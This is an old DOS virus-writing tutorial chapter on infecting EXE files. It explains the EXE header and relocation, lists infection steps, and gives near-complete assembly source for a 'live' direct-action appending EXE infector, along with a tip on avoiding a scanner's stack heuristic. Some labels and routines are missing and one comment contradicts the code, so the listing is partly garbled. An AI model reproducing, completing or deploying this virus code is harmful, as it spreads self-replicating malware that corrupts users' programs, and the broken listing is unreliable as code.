EXE Viruses

    COM files are generally only written as quick utilities or as
        pieces of an operating system - especially today, they just aren't
        practical for large applications.  Because of this, they provide a
        rather limited medium over which a virus can spread.  EXE files,
        however, are more common in most DOS-based systems and offer
        viruses a better chance of survival.  Infecting EXE files,
        however, is a little more complex than infecting COM's.  Let us
        first take a look at exactly how an EXE is structured.
             First off, unlike the COM files, EXE's are NOT a direct
        memory image of the program.  At the start of their code in a file,
        they have what is called the EXE Header.  This header is used to
        tell DOS things like where execution should start within the file
        (not necessarily at the beginning), where the stack should be, etc.
        After the header is what's called the Relocation Table.  In most
        small .EXE files, this is empty.  For any .EXE larger than 64k,
        and several below, this table plays a vital part in loading.  The
        way it works is this:  When DOS executes an EXE, it chooses the
        first free segment in memory.  Then, like with COM's, it loads the
        PSP into that segment.  Unlike COM's, with EXE files DOS adds 10h
        to CS, leaving ES and DS to point at the PSP segment.  This means
        that the the program (excluding header) begins at CS:0000, where
        the PSP is set at [CS-10h]:0000.  After the initial loading, it
        still must make use of the relocation table.  The relocation table
        stores a list of pointers, each pointing to an address within the
        program.  At each of these addresses is one of several absolute
        addressing commands that need to be adjusted for the segment that
        DOS initiates the program at.  DOS goes through this table and adds
        the beginning segment of the program to each address.
        For example, in a file there is the following command:
                        JMP     0000:0123
             The file is loaded with the PSP at 10AB:0000 in memory,
        making the program start at 10BB:0000.  After relocation by DOS,
        the command reads the following:
                        JMP     10BB:0123
              An important thing to remember is that only the commands
        indicated in the relocation table will be changed in this method.
        This means you can just write a virus in one segment, avoiding any
        far calls within the code (except to static locations - DOS,
        for example).  Some, however, do wish to use far calls and must
        modify the relocation table.
              Now that we've looked at basically how DOS loads EXE files,
        let's take a closer look at the EXE header, as it is the most
        important part for viruses.  The structure is as follows:
                              EXE Header Format
        |00     EXE Signature       | Usually 'MZ' but can be 'ZM'        |
        |02     Length of Last Page | In bytes                            |
        |04     Size of File        | In 512 byte pages, rounded up.      |
        |06     # of Rel. Tbl. Items|                                     |
        |08     Size of EXE Header  | 16 byte paragraphs.                 |
        |0A     MINALLOC            | Minimum memory allocated to file    |
        |0C     MAXALLOC            | Maximum memory allocated to file    |
        |0E     Initial SS          | Initial stack segment, relative to  |
        |                           |    the beginning of the file.       |
        |10     Initial SP          | Initial offset of stack pointer     |
        |12     Negative Checksum   | Generally unused - Good place       |
        |                           |    for ID bytes (overused though)   |
        |14     Initial IP          | Initial execution offset            |
        |16     Initial CS          | Initial execution segment, relative |
        |                           |      to start of program.           |
        |18     First Reloc. Item   | Pointer to relocation table         |
        |1A     Overlay Number      | Overlay Marker                      |
             To infect an .EXE file using the generic appending method, one
        must do the following:
                1.)  Make sure it is an .EXE file, not just misnamed,
                     by checking the ID signature for 'MZ'.
                2.)  Store important registers from header that will
                     be changed such as CS, IP, SS, and SP.
                2.)  Append the code to the end.
                3.)  Set CS:IP to point to viral code.
                4.)  Set SS:SP to be a viable location - make sure that
                     you aren't going to push data over yourself or the
                     host program!  This is also a good place to set
                     predictable values (in SP) for infection marking.
                     (NOTE: TBSCAN and some others check for odd-
                            numbered stacks when looking for viruses.)
                5.)  Recalculate the file size.  Store as pages (rounding
                     up) at offset 04 in header, then store the number
                     of bytes in the last page at offset 02.
                6.)  If you are using far calls within code that need to
                     be adjusted by the relocation table (NOT recommended)
                     then the addresses should be added to the reloc.
                     table at this point.  BE SURE THAT THERE IS ENOUGH
                     SPACE IN THE TABLE, OR ENLARGE THE TABLE!  Also,
                     adjust the "# of relocation table items" field
                     appropriately.  Notice that doing all this is
                     a pain and generally not all that useful.
                7.)  Restore control to Host by resetting stack to original
                     value, then setting CS:IP to point to old starting
                     point.  MAKE SURE TO SET ES AND DS TO POINT AT PSP.
                     Also remember that the returning CS and SS must be
                     adjusted by adding ES+10 to each.
             Now that we have learned the basics, let's check out the next
        virus. It is also a direct-action infector, but this one infects
        only EXE files.  Notice that the code is based on the direct-action
        COM file presented earlier.
        ;     This file is a direct-action appending .EXE infector
        ;written in TASM - compatible assembler for the IBM PC.
        ;It is presented as a part of VIROLOGY 101 (c) 1993 Black Wolf.
        ;It is a live virus, and should NOT be released.  Please execute
        ;the virus only on isolated machines under controlled conditions.
        .model tiny
        .radix 16                               ;Default into Hexidecimal
                org 100
                push    ds                      ;Save old offset
                push    cs cs                   ;Set ES = DS = CS
                pop     es ds                   ;for data accessing.
                call    get_offset              ;This places the displace-
        get_offset:                             ;ment of the virus from
                pop     bp                      ;its original compilation
                sub     bp,offset get_offset    ;into BP.
        Reset_Variables:                        ;Reset Old_XX values for
                lea     di,[Store_IP+bp]        ;new infection.
                lea     si,[Old_IP+bp]
                lea     dx,[New_DTA+bp]         ;Set DTA to the after
                mov     ah,1a                   ;virus
                int     21
                mov     ah,4e
                xor     cx,cx                   ;Look only for normal
                lea     dx,[File_Mask+bp]       ;Search for all files
                                                ;matching '*.COM'
                int     21
                jc      No_More_Files
                mov     ax,3d02
                lea     dx,[New_DTA+1e+bp]      ;offset 1eh in DTA =
                int     21                      ;Open file for read/write
                xchg    bx,ax                   ;Put File handle into BX
                mov     ah,3f
                mov     cx,1a
                lea     dx,[exe_header+bp]      ;Read in EXE header.
                int     21
                cmp     word ptr [exe_header+bp],'ZM' ;Standard EXE mark.
                jne     close_file                        ;Quit, misnamed
                cmp     byte ptr [exe_header+bp+12],'V'   ;Check infection
                je      close_file                        ;mark in checksum
                call    Save_Old_Header
                mov     ax,4202                 ;Go to the end of the file.
                xor     cx,cx                   ;This function returns
                xor     dx,dx                   ;file size into
                int     21                      ;DX:AX
                push    ax dx
                call    calculate_CSIP          ;calculate starting
                pop     dx ax                   ;DX:AX = uninfected
                                                ;file size.
                call    calculate_size          ;calculate file size for
                mov     ah,40                   ;Write virus to the end
                mov     cx,end_virus-start      ;of the file.
                lea     dx,[bp+start]
                int     21
                mov     ax,4200                 ;Return to the beginning
                xor     cx,cx                   ;of the file.
                xor     dx,dx
                int     21
                mov     ah,40                   ;Write header to the
                mov     cx,1a                   ;beginning of file.
                lea     dx,[bp+exe_header]
                int     21
                mov     ah,3e
                int     21
                jmp     No_More_Files           ;Only infect one each time
        Close_File:                             ;Close current file
                mov     ah,3e
                int     21                      ;Close file, then
                                                ;go to find another
        Find_Next_File:                         ;file.
                mov     ah,4f
                jmp     Find_File
        No_More_Files:          ;Reset DTA to original location
                pop     ds      ;Get PSP segment
                mov     dx,80
                mov     ah,1a
                int     21
                push    ds              ;Restore ES = DS = PSP
                pop     es
                mov     ax,es
                add     ax,10           ;add ajustment for PSP
                add     word ptr cs:[Store_CS+bp],ax ;Adjust old CS by
                                                     ;current seg
                add     ax,word ptr cs:[bp+Store_SS] ;Adjust old SS
                mov     ss,ax                        ;Restore stack to
                mov     sp,word ptr cs:[bp+Store_SP] ;original position
                db      0ea     ;Simulate far jump to Store_CS:Store_IP
        Store_IP        dw      0
        Store_CS        dw      0
        Store_SP        dw      0
        Store_SS        dw      0
        Old_IP  dw      0
        Old_CS  dw      0fff0           ;Initially points to an
        Old_SP  dw      0               ;INT 20 in PSP for first
        Old_SS  dw      0fff0           ;run.
                mov     ax,word ptr [exe_header+bp+0e]    ;Save old SS
                mov     word ptr [Old_SS+bp],ax
                mov     ax,word ptr [exe_header+bp+10]    ;Save old SP
                mov     word ptr [Old_SP+bp],ax
                mov     ax,word ptr [exe_header+bp+14]    ;Save old IP
                mov     word ptr [Old_IP+bp],ax
                mov     ax,word ptr [exe_header+bp+16]    ;Save old CS
                mov     word ptr [Old_CS+bp],ax
                push    ax
                mov     ax,word ptr [exe_header+bp+8]   ;Get header length
                mov     cl,4                            ;and convert it to
                shl     ax,cl                           ;bytes.
                mov     cx,ax
                pop     ax
                sub     ax,cx                           ;Subtract header
                sbb     dx,0                            ;size from file
                                                        ;size for memory
                mov     cl,0c                           ;Convert DX into
                shl     dx,cl                           ;segment Address
                mov     cl,4
                push    ax                      ;Change offset (AX) into
                shr     ax,cl                   ;segment, except for last
                add     dx,ax                   ;digit.  Add to DX and
                shl     ax,cl                   ;save DX as new CS, put
                pop     cx                      ;left over into CX and
                sub     cx,ax                   ;store as the new IP.
                mov     word ptr [exe_header+bp+14],cx
                mov     word ptr [exe_header+bp+16],dx  ;Set new CS:IP
                mov     word ptr [exe_header+bp+0e],dx  ;Set new SS = CS
                mov     word ptr [exe_header+bp+10],0fffe ;Set new SP
                mov     byte ptr [exe_header+bp+12],'V' ;mark infection
                push    ax                      ;Save offset for later
                add     ax,end_virus-start      ;Add virus size to DX:AX
                adc     dx,0
                mov     cl,7
                shl     dx,cl                   ;convert DX to pages
                mov     cl,9
                shr     ax,cl
                add     ax,dx
                inc     ax
                mov     word ptr [exe_header+bp+04],ax  ;save # of pages
                pop     ax                              ;Get offset
                mov     dx,ax
                shr     ax,cl                           ;Calc remainder
                shl     ax,cl                           ;in last page
                sub     dx,ax
                mov     word ptr [exe_header+bp+02],dx ;save remainder
        File_Mask       db     '*.EXE',0     ;File mask used for search
        exe_header      db      1a dup (?)
        end start